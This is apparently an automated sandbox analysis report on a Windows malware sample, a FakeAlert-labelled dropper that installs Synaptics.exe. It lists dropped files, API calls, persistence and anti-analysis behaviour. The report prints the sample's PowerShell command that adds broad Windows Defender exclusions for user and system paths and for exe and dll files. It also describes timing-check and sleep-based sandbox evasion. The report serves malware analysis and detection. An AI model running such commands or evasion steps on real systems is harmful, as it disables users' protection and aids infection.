Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DEBUG_STRIPPED, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\._cache_uniformerede.exe Code function: 7_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0043F118 NtdllDefWindowProc_A,GetCapture
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_004598AC NtdllDefWindowProc_A
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0045E9EC SHGetPathFromIDList,SHGetPathFromIDList,NtdllDefWindowProc_A
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0044EA40 GetSubMenu,SaveDC,RestoreDC,73C9B080,SaveDC,RestoreDC,NtdllDefWindowProc_A
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0042F60C NtdllDefWindowProc_A
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_0043F118 NtdllDefWindowProc_A,GetCapture
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_004598AC NtdllDefWindowProc_A
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_0045E9EC SHGetPathFromIDList,SHGetPathFromIDList,NtdllDefWindowProc_A
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_0044EA40 GetSubMenu,SaveDC,RestoreDC,73C9B080,SaveDC,RestoreDC,NtdllDefWindowProc_A
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_0042F60C NtdllDefWindowProc_A
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_0043F118 NtdllDefWindowProc_A,GetCapture
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_004598AC NtdllDefWindowProc_A
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_0045E9EC SHGetPathFromIDList,SHGetPathFromIDList,NtdllDefWindowProc_A
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_0044EA40 GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_0042F60C NtdllDefWindowProc_A
Source: uniformerede.exe.0.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Source: uniformerede.exe.0.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: Synaptics.exe.6.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Source: Synaptics.exe.6.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: RCXCD96.tmp.6.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: YC9w8Aif.exe.9.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.9.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.9.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: RCXDA77.tmp.9.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: RCXDA77.tmp.9.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: RCXF979.tmp.9.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: RCXF979.tmp.9.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: ~$cache1.9.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, 00000000.00000002.269486507.0000000000954000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFileName vs SecuriteInfo.com.Variant.FakeAlert.2.24488.exe
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, 00000000.00000002.269486507.0000000000954000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameb! vs SecuriteInfo.com.Variant.FakeAlert.2.24488.exe
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.9.dr Binary or memory string: OriginalFileName vs SecuriteInfo.com.Variant.FakeAlert.2.24488.exe
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.9.dr Binary or memory string: OriginalFilenameb! vs SecuriteInfo.com.Variant.FakeAlert.2.24488.exe
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20220527
Source: classification engine Classification label: mal100.troj.evad.winEXE@21/60@6/2
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_00425FB8 GetLastError,FormatMessageA
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Synaptics\Synaptics.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Synaptics\Synaptics.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_004747D8 FindResourceA
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe Virustotal: Detection: 62%
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe ReversingLabs: Detection: 58%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe "C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c start "" "C:\Users\user\AppData\Local\Temp\uniformerede.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\uniformerede.exe "C:\Users\user\AppData\Local\Temp\uniformerede.exe"
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Process created: C:\Users\user\Desktop\._cache_uniformerede.exe "C:\Users\user\Desktop\._cache_uniformerede.exe"
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
Source: unknown Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\ProgramData\Synaptics\Synaptics.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6620 -s 2904
Source: C:\ProgramData\Synaptics\Synaptics.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6620 -s 4052
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_00475958 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,GetLastError
Source: C:\Users\user\Desktop\._cache_uniformerede.exe Code function: 7_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_00475958 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,GetLastError
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_00475958 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,GetLastError
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe File created: C:\Users\user\AppData\Local\Temp\uniformerede.exe
Source: C:\Users\user\Desktop\._cache_uniformerede.exe Code function: 7_2_004021AA CoCreateInstance
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_00409ED2 GetDiskFreeSpaceA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6356:120:WilError_01
Source: C:\ProgramData\Synaptics\Synaptics.exe Mutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6300:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6620
Source: C:\Users\user\Desktop\._cache_uniformerede.exe File written: C:\Users\user\AppData\Local\Temp\udfrielser.ini
Source: Yara match File source: 12.0.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.Synaptics.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.Synaptics.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.Synaptics.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.uniformerede.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.uniformerede.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\YC9w8Aif.exe, type: DROPPED
Source: Yara match File source: C:\ProgramData\Synaptics\RCXCD96.tmp, type: DROPPED
Source: Yara match File source: C:\Users\user\Documents\DUUDTUBZFW\~$cache1, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\uniformerede.exe, type: DROPPED
Source: Yara match File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\RCXF979.tmp, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\RCXDA77.tmp, type: DROPPED
Source: C:\ProgramData\Synaptics\Synaptics.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: C:\Users\user\Desktop\._cache_uniformerede.exe Registry value created: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\URBANITETENS
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe Static file information: File size 1490944 > 1048576
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x136600

Data Obfuscation

Source: Yara match File source: 00000007.00000002.532970198.00000000030C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00496530 push 00496586h; ret 6_2_0049657E
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0048859C push 004885DEh; ret 6_2_004885D6
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00432650 push 004326C6h; ret 6_2_004326BE
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0049A6BC push 0049A745h; ret 6_2_0049A73D
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00480744 push 00480770h; ret 6_2_00480768
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0049A750 push 0049A776h; ret 6_2_0049A76E
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0048077C push 004807A8h; ret 6_2_004807A0
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0048477C push 004847A8h; ret 6_2_004847A0
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_004730FC LoadLibraryA,GetProcAddress,SHGetSpecialFolderLocation,SHGetPathFromIDList,SHGetSpecialFolderLocation,SHGetPathFromIDList,6_2_004730FC

                                Persistence and Installation Behavior

                                Source: C:\ProgramData\Synaptics\Synaptics.exe File created: C:\Users\user\Documents\DUUDTUBZFW\~$cache1
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe File created: C:\ProgramData\Synaptics\Synaptics.exe
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe File created: C:\ProgramData\Synaptics\RCXCD96.tmp
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe File created: C:\Users\user\Desktop\._cache_uniformerede.exe
                                Source: C:\ProgramData\Synaptics\Synaptics.exe File created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe
                                Source: C:\ProgramData\Synaptics\Synaptics.exe File created: C:\Users\user\AppData\Local\Temp\YC9w8Aif.exe
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exe File created: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe File created: C:\Users\user\AppData\Local\Temp\uniformerede.exe
                                Source: C:\ProgramData\Synaptics\Synaptics.exe File created: C:\Users\user\AppData\Local\Temp\RCXF979.tmp
                                Source: C:\ProgramData\Synaptics\Synaptics.exe File created: C:\Users\user\AppData\Local\Temp\RCXDA77.tmp

                                Hooking and other Techniques for Hiding and Protection

                                Source: initial sample Icon embedded in binary file: icon matches a legit application icon: download (31).png
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_00459934 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 6_2_00459934
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 6_2_0045A054
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 6_2_0045A104
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0042C6FC IsIconic,GetWindowPlacement,GetWindowRect, 6_2_0042C6FC
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0044083C IsIconic,GetCapture, 6_2_0044083C
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0045695C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 6_2_0045695C
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_004410F0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 6_2_004410F0
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_00441A14 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 6_2_00441A14
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_00459934 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 9_2_00459934
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 9_2_0045A054
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 9_2_0045A104
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_0042C6FC IsIconic,GetWindowPlacement,GetWindowRect, 9_2_0042C6FC
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_0044083C IsIconic,GetCapture, 9_2_0044083C
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_0045695C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 9_2_0045695C
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_004410F0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 9_2_004410F0
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_00441A14 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 9_2_00441A14
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_00459934 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 12_2_00459934
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 12_2_0045A054
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 12_2_0045A104
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_0042C6FC IsIconic,GetWindowPlacement,GetWindowRect, 12_2_0042C6FC
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_0044083C IsIconic,GetCapture, 12_2_0044083C
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_0045695C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 12_2_0045695C
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_004410F0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 12_2_004410F0
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_00441A14 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 12_2_00441A14
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0042E3B4 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_0042E3B4
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                Source: C:\Users\user\Desktop\._cache_uniformerede.exe RDTSC instruction interceptor: First address: 000000000310E555 second address: 000000000310E555 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F0604C38FC6h 0x00000006 cmp al, 87h 0x00000008 inc ebp 0x00000009 test edx, ebx 0x0000000b inc ebx 0x0000000c rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_00435BD4
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_00435BD4
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_00435BD4
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6424 Thread sleep count: 5521 > 30
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6412 Thread sleep count: 695 > 30
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6520 Thread sleep time: -6456360425798339s >= -30000s
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6468 Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 7164 Thread sleep time: -840000s >= -30000s
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6832 Thread sleep count: 1488 > 30
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6896 Thread sleep time: -1844674407370954s >= -30000s
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6868 Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5521
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 695
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1488
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe API coverage: 7.5 %
                                Source: C:\ProgramData\Synaptics\Synaptics.exe API coverage: 5.8 %
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Dropped PE file which has not been started: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RCXF979.tmp
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RCXDA77.tmp
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,6_2_00458EA4
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,12_2_00458EA4
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Thread delayed: delay time: 60000
